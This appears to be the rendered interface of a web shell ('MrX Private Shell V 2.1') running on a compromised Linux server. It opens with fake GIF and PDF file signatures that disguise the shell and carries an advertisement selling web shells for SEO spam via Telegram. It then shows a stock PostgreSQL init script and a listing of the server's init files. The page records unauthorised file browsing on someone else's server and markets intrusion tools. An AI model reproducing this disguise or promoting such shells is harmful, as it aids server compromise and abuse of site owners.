GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh
set -e
### BEGIN INIT INFO
# Provides: postgresql
# Required-Start: $local_fs $remote_fs $network $time
# Required-Stop: $local_fs $remote_fs $network $time
# Should-Start: $syslog
# Should-Stop: $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: PostgreSQL RDBMS server
### END INIT INFO
# Setting environment variables for the postmaster here does not work; please
# set them in /etc/postgresql/<version>/<cluster>/environment instead.
[ -r /usr/share/postgresql-common/init.d-functions ] || exit 0
. /usr/share/postgresql-common/init.d-functions
# versions can be specified explicitly
if [ -n "$2" ]; then
versions="$2 $3 $4 $5 $6 $7 $8 $9"
else
get_versions
fi
case "$1" in
start|stop|restart|reload)
if [ "$1" = "start" ]; then
create_socket_directory
fi
if [ -z "`pg_lsclusters -h`" ]; then
log_warning_msg 'No PostgreSQL clusters exist; see "man pg_createcluster"'
exit 0
fi
for v in $versions; do
$1 $v || EXIT=$?
done
exit ${EXIT:-0}
;;
status)
LS=`pg_lsclusters -h`
# no clusters -> unknown status
[ -n "$LS" ] || exit 4
echo "$LS" | awk 'BEGIN {rc=0} {if (match($4, "down")) rc=3; printf ("%s/%s (port %s): %s\n", $1, $2, $3, $4)}; END {exit rc}'
;;
force-reload)
for v in $versions; do
reload $v
done
;;
*)
echo "Usage: $0 {start|stop|restart|reload|force-reload|status} [version ..]"
exit 1
;;
esac
exit 0
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| K01apache-htcacheclean | File | 2.43 KB | 0755 |
|
| K01apache2 | File | 7.99 KB | 0755 |
|
| K01cryptdisks | File | 937 B | 0755 |
|
| K01cryptdisks-early | File | 896 B | 0755 |
|
| K01docker | File | 3.75 KB | 0755 |
|
| K01irqbalance | File | 2.58 KB | 0755 |
|
| K01iscsid | File | 1.47 KB | 0755 |
|
| K01lvm2-lvmpolld | File | 586 B | 0755 |
|
| K01mariadb | File | 6.59 KB | 0755 |
|
| K01nginx | File | 4.47 KB | 0755 |
|
| K01open-iscsi | File | 2.38 KB | 0755 |
|
| K01open-vm-tools | File | 1.8 KB | 0755 |
|
| K01php8.3-fpm | File | 4.19 KB | 0755 |
|
| K01plymouth | File | 1.35 KB | 0755 |
|
| K01postgresql | File | 1.46 KB | 0755 |
|
| K01qemu-guest-agent | File | 3.04 KB | 0755 |
|
| K01redis-server | File | 1.58 KB | 0755 |
|
| K01udev | File | 6.71 KB | 0755 |
|
| K01unattended-upgrades | File | 1.36 KB | 0755 |
|
| K01uuidd | File | 1.28 KB | 0755 |
|